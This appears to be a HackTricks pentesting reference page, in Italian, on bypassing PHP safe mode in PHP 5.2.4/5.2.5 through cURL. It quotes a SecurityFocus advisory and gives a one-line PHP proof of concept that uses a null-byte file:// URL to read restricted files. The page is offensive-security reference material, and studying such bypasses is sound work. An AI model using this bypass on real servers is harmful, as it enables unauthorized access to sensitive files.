disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

PHP 5.2.4 e 5.2.5 PHP cURL

Da http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

source: http://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4.

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__)));

Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

Previousdisable_functions bypass - PHP <= 5.2.9 on windows Nextdisable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit

Last updated 1 month ago